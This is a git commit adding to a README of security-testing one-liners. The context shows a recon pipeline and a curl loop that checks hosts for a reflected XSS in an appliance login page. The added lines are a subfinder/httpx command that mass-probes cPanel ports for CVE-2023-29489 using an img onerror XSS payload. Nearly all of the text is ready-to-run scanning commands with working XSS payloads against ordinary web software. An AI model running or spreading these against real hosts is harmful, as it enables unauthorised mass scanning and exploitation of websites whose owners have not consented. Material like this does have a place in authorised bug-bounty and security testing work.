Update README.md
parent
241e21e8f3
commit
c8c2c1ef25
|
@ -18,3 +18,9 @@ subfinder -d site.com | httpx | waybackurls | grep -E ".json(?:onp?)?$"
|
|||
```bash
|
||||
cat subs.txt | while read host do; do curl -sk "$host/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/onload=alert(document.domain)>' && echo "$host: Vuln" || echo "$host: Not Vuln"; done
|
||||
```
|
||||
|
||||
### CVE-2023-29489
|
||||
|
||||
```bash
|
||||
subfinder -d target.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path 'cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaa' -mc 400
|
||||
```
|
||||
|
|
Loading…
Reference in New Issue